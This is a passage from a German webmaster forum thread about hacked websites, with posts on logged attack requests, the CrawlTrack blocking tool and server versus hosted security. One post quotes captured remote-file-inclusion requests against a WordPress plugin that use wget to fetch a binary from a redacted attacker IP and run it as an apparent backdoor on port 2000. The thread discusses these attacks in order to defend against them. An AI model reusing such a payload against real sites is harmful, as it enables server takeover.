Anzeige - [Hier werben / Mediadaten]
(?) Tags raten (?) (edit)
Seiten: (2) 1 [2]  ( Neuster Beitrag anzeigen )
Reply to this topicStart new topicStart Poll
Diskussion

Website gehackt

Virus on Board

Jürgen Auer
Server-Daten - Online-CRM-Lösungen
Geschrieben am: Fr 29.02.2008, 09:00
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 3276
Mitglied seit: 4.02.2006


server-daten schickt mir da ab und an so niedliche Mails: Heute wieder stapelweise:

CODE
/wp/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http:
//ip-nummer/cmd.gif?&cmd=cd%20/tmp;wget%20ip-nummer/cback;chmod%20
755%20cback;./cback%20ip-nummer%202000;echo%20YYY;echo%7C

/wordpress/syntax_highlight.php?libpath=http://ip-nummer/cmd.gif?&cmd=
cd%20/tmp;wget%20ip-nummer/cback;chmod%20755%20cback;./cback%20ip-nummer%202000;echo%20YYY;echo%7C


Man sieht: Da wird versucht, ein Gif nachzuladen, da kommt dann ein Ladebefehl ran. Und dann ist der Server meiner.

Wordpress, PHPAdmin, Xmlrpc - alles, was es so an niedlichen Softwareprodukten alles gibt.

PS: Die IP-Nummer habe ich rausgenommen. Das cmd.gif enthält PHP-Code, eine ganze Bibliothek. Das cback, das heruntergeladen wird, ist ein Exe-Programm, macht wohl gleich eine Backdoor auf.

Man sieht: Man muß nicht bloß alle Scripte, sondern den gesamten Server kontrollieren - alle Prozesse, die automatisch gestartet werden.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

Server-Daten - die Single-Data-Solution: Web-Datenbanken als Online - CRM - Lösung.
Ihre Geschäftsprozesse entscheiden, was Ihre Online-Datenbank macht. Sie konzentrieren sich auf Ihr Kerngeschäft - Ihre Datenbank funktioniert.
Top
PMEmail PosterUsers Website
Top
 
 
memoriam
memoriam.de GmbH
#22 Geschrieben am: Fr 29.02.2008, 10:08 (+01:07)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 495
Mitglied seit: 30.03.2005


Danke Spaceman!


--------------------
Suche nach Bestattern mit dem Fachzeichen des Bundesverbandes Deutscher Bestatter
Top
PMEmail PosterUsers Website
Top
 
Evelyne Marti
Lektorat www.evelyne-marti.ch
#23 Geschrieben am: Fr 29.02.2008, 10:59 (+00:51)
Report PostQuote Post

AyomRank 6
************

Gruppe: Member (aktiv)
Beiträge: 650
Mitglied seit: 20.01.2008


Hi zusammen

Ist dieses Problem nur bei Server-Inhabern vorhanden oder auch bei Hosting-Paketen bzw. kümmert sich da der Hoster darum?


--------------------
Liebe Grüße
Evelyne

www.evelyne-marti.ch
Top
PMEmail PosterUsers Website
Top
 
spacefun
#24 Geschrieben am: Fr 29.02.2008, 11:00 (+00:00)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 261
Mitglied seit: 24.01.2004


Ich bedanke mich bei euch für die Unterstützung und Tipps wink.gif

Vom kleinen Script "CrawlTrack" bin ich begeistert. http://www.crawltrack.fr
Es hat in nicht mal 24 Stunden 7 Angriffe (code injection) abgewehrt.


QUOTE
Ist dieses Problem nur bei Server-Inhabern vorhanden oder auch bei Hosting-Paketen bzw. kümmert sich da der Hoster darum?

Ich denke das spielt keine Rolle ob eigener Server oder nicht. Es geht um die diversen Scripte, die Lecks haben. Deshalb ist es ja auch so wichtig, das immer auf die neuste Version geupdatet wird.

Gruss space wink.gif
Top
PM
Top
 
Evelyne Marti
Lektorat www.evelyne-marti.ch
#25 Geschrieben am: Fr 29.02.2008, 11:09 (+00:08)
Report PostQuote Post

AyomRank 6
************

Gruppe: Member (aktiv)
Beiträge: 650
Mitglied seit: 20.01.2008


Hi Spacefun

Bei meiner Software viscacha.org gibt´s eine Spider-Verwaltung, wo einzelne Spider gesperrt werden können, sieht ähnlich aus wie im Link. Ist das dasselbe oder muss man hier die "Angreifer" nicht mal kennen?


--------------------
Liebe Grüße
Evelyne

www.evelyne-marti.ch
Top
PMEmail PosterUsers Website
Top
 
spacefun
#26 Geschrieben am: Fr 29.02.2008, 11:17 (+00:07)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 261
Mitglied seit: 24.01.2004


Hallo Lynn

Beim Script "CrawlTrack geht alles vollautomatisch. Man muss nur ab und zu die Crawler und Angreiferliste updaten.

Gruss space wink.gif
Top
PM
Top
 
TSc
#27 Geschrieben am: Fr 29.02.2008, 11:55 (+00:38)
Report PostQuote Post

AyomRank 7
**************

Gruppe: Member (aktiv)
Beiträge: 1121
Mitglied seit: 8.11.2004


QUOTE (spacefun @ Fr 29.02.2008, 11:00)
QUOTE
Ist dieses Problem nur bei Server-Inhabern vorhanden oder auch bei Hosting-Paketen bzw. kümmert sich da der Hoster darum?

Ich denke das spielt keine Rolle ob eigener Server oder nicht.

Das ist so nicht ganz richtig.
Ebenso wie die Scripte Lücken haben können ist es möglich Schwachstellen in der Server-Konfiguration auszunutzen um Schadcode einzuschleusen.

Darüber ist es z.B. möglich Scripte auszutauschen. Da hilft dann auch deine Kontrolle vorher nichts mehr.

Daher ist es genau so wichtig auch seinen Server entsprechend abzusichern.
Bei hostingpaketen übernimmt das (mehr oder weniger gut) der Provider, bei einem eigenen Server must du dich selber bemühen.


--------------------
---~~~ Meine zwei güldenen Regeln zu nachhaltigem SEO ~~~---
1. Google mag was der User mag.
2. Content ist King!

Ferienhaus in der Eifel
Top
PMEmail Poster
Top
 
spacefun
#28 Geschrieben am: Fr 29.02.2008, 12:35 (+00:39)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 261
Mitglied seit: 24.01.2004


QUOTE
Das ist so nicht ganz richtig.

Das ist schon klar. Aber ich gehe davon aus das die gängigen Sicherheitseinstellungen in der php.ini und auf dem Server aktiviert sind.

Auch dann kann ja ein unsicheres Script für Angriffe die Hintertür öffnen. Bei mir ist ein Reseller-Account betroffen. Ich habe die eigenen Server aufgegeben. Die dauernenden notwendigen Updates machten zuviel Arbeit welche ich lieber in neue Projekte investiere.


Gruss space wink.gif
Top
PM
Top
 
TSc
#29 Geschrieben am: Fr 29.02.2008, 13:02 (+00:27)
Report PostQuote Post

AyomRank 7
**************

Gruppe: Member (aktiv)
Beiträge: 1121
Mitglied seit: 8.11.2004


Das kann ich gut verstehen.
Ich wollte das nur nochmal klarstellen. Deine Antwort oben hätte man nämlich auch lesen können ala "Ne, brauchst dich um deinen eigenen Server nicht kümmern, da kann nix passieren."
Und das kann dann sehr schnell gefährlich werden... wink.gif


--------------------
---~~~ Meine zwei güldenen Regeln zu nachhaltigem SEO ~~~---
1. Google mag was der User mag.
2. Content ist King!

Ferienhaus in der Eifel
Top
PMEmail Poster
Top
 
spacefun
#30 Geschrieben am: Sa 1.03.2008, 22:26 (+33:23)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 261
Mitglied seit: 24.01.2004


Das Crawl Track Tool arbeitet gut.

In zwei Tagen schon über hundert Angriffe abgewehrt.

Hier einer der harmloseren:
http://www.servicesbrazil.net/ - so zugedröhnt scheinen sie nicht zu sein wink.gif

Das fehlerhafte Script habe ich auch entdeckt - ein Postkarten Script.

gruss space
Top
PM
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/23188

Topic Options Seiten: (2) 1 [2]  Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Suche Countdown Script für Website Alexandra_Holzenkamp 197 3 Mi 10.03.2010, 17:47
Firmensite gehackt - was machen? Benedict 1106 31 Mo 15.02.2010, 12:56
Geocodieren ohne Website Big Rob 175 1 Fr 12.02.2010, 18:13
Exakt selbe Website 1:1 auf 4 verschiedenen Domain selfbusiness 500 4 Mo 8.02.2010, 18:41
Neues Website Projekt ajse80 293 11 Fr 29.01.2010, 12:42
Verkaufe Schlüsseldienst-Website michael p. 334 1 Mo 18.01.2010, 17:38
Bachelor-Thesis: Ich evaluiere (D)eine Website neffetshd 243 0 Di 12.01.2010, 13:44




Anzeige - [Hier werben / Mediadaten]



Anzeigen


[Hier werben / Mediadaten]